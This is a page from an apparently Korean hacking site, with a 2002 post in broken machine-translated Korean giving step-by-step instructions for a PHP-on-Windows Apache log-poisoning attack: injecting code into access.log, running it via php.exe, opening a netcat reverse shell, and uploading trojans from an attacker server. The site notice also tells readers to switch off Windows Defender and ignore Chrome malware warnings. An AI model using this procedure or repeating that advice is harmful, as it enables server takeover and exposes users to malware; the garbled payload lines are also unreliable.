::::: 해커즈뉴스 / 해커몰 :::::

해커즈뉴스 / 해커대학

Donation bitcoin(기부용 비트코인 주소)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.

Donation bitcoin(기부용 비트코인 주소)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.

공지

1. MS 엣지 브라우저에서의 경고창은 '윈도우 디펜더'를 끄시면 됩니다.

'윈도우 디펜더 끄기'

2. 크롬 브라우저로 접속시 나오는 악성코드 경고창은 구글 크롬의 에러, 즉 오탐(탐지 오류)이므로 무시하시면 됩니다.

3. 이 사이트는 안전하며 깨끗하다는 것을 알려 드립니다.

4. 무고한 사이트들에 대한 공룡 기업 브라우저들의 무차별적인 '탐지 오류 횡포'가 사용자들의 정보 공유의 자유를 침해하고 있습니다. 이에 대응하여 이 기업들을 상대로 소송을 준비하고 있습니다.

2002/5/24(금)

[윈도 2K]PHP.exe를 통하여 루트로 권한 획득

몇달전의 버그지만 지금도 상당히 먹힙니다.

보안 유지에 심혈을 기울일 때입니다.

=================================

주요한 보안 취약점은 윈도우즈용 PHP에 발견되었다. 그 취약점은 악의 있는 PHP 기본명령어를
아
파치 로그 파일로 삽입하는 것으로 임의 코드를 실행하기 위하여 표준 HTML 루트 디렉토리의 밖
에
존재한 파일들을 볼 PHP의 능력을 개발한 공격자를 허용한다.

취약점을 가지고 있는 시스템들 : 아파치 서버 버젼2.0으로 PHP 버젼4.0 .

익스플로잇(명령을 실행하는 것) : 사용자가 위치 " c:\apache "에 아파치를 설치하였던 것과 그
리
고 php.exe가 c:\php\php.exe의 기본 경로에서 설치되였다고 가정하자.루트를 획득하기 위한
단계
는 다음과 같다.

브라우저에 , 아래와 같이 입력한다:

1) http://www.example.com/('thecommandtoexecutewithpath');%20?>.

아파치는 access.log파일에 요청라인을 추가할 것이다.
php.exe php.exe를 가진 로그 파일의 요청에 의하여 이것과 같이 php 시스템 코드를 구동할수
있
다.

2 ) http://www.example.com/php/php.exe?c:\apache\logs\access.log
이것은 위에서 언급된 php 코드를 실행할 것이다.
루트가 획득되어 지는 이 방법은 webserver가 아래와 같은명령 netcat를 실행한 당신의 서버에
리
버스 telnet 하도록 하는 것이다.

" nc - l - n - v - p "

여기서 볼수 있듯이, php.exe 익스플로잇을 가지고 전체 서버에 타협하는 것은 매우 간단한 일이
다.
익스플로이 업로드 하기 : 1) mytestfile.txt라는 텍스트 파일을 당신의 웹서버에 만든다.

2) 그것의 안에 있는 텍스트의 짧은 행을 써라.

3) 얼마나 그 파일이 (바이트에) 크게 인지를 확인하여라.

4) 그 파일이 http://[YOUR_SERVER_IP]/mytestfile.txt를 입력하는 것에 의해서 당신의 브라우
저
를 통하여 접근될 수 있는지를 확인하라 .

5) 그 파일이 당신의 브라우저로 http://www.example.com/mytestfile.txt를 입력하는 것으로 서
버
에 존재하는 것을 확인하라.

6) 당신은 지금 4번 을(만약 그 브라우저가 연결하는 것처럼 보이지 않으면, 걱정하지 말라

7) 당신의 브라우저 http://www.example.com/ [YOUR_SERVER_IP]/mytestfile.txt"," rb) 요청하라. .

8) 대략 10 초동안 대기 .

9) 브라우저에http://www.example.com/ [REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?> 요청하라

10) 대략 10 초를 기다리어 주십시오!.

11) 당신의 브라우저 http://www.example.com/ ("c:/Apache2/htdocs/mytestfile.txt","wb");?>에 요청하라.

12) 대략 10 초 동안 대기한다.

13) 당신의 브라우저에http://www.example.com/요청하라.

14) 대략 10 초를 기다리어 주십시오!.

15) http://www.example.com/nonexistantfile.htm을 입력하는것으로 실재하지 않은 파일을(접
근
로그를 넘치게 하기 위하여) 위해 요청을 한다.

16) 대략 10 초를 기다리어 주십시오!.

17) php.exe가 http://www.example.com/php/php.exe?c:\apache2\logs\access.log을
입력하는
것으로 아파치logfile를 파싱하게 한다.

18) 그 로그 파일이 파싱되도록 확실히 하는 Refresh를 누른다.

19) 당신의 브라우저에 http://www.example.com/mytestfile.txt을 입력하여 서버의 파일을 확인
한
다.

트로이목마 exe 파일, php 파일을 업로드 할수 있다.업로드 파일의 제한이 없다. 따라서 이러한
동
작을 이용하여 얼마든지 악의적인행위나 트로이 목마를 설치할수 있다.

번호	구분	장르	제 목	작성일
15			[추천 팁]윈도우 미디어 플레이어 VTV처럼 사용하기	05/26-06:05
14			[추천 팁]윈자체 공유 클라이언트 ip에서 ftp-구루구루 서버돌리...	05/25-06:20
13			[윈도 2K]PHP.exe를 통하여 루트로 권한 획득	05/24-06:29
12			[추천 툴]내 컴퓨터속의 불청객....	05/23-07:59
11			[윈도 XP]윈도우xp 인스톨시에 sxs.dll 오류에 관한팁	05/22-06:54
10			[윈도 XP]네트웍 xp와 95&98 공유 잘안될때	05/21-03:56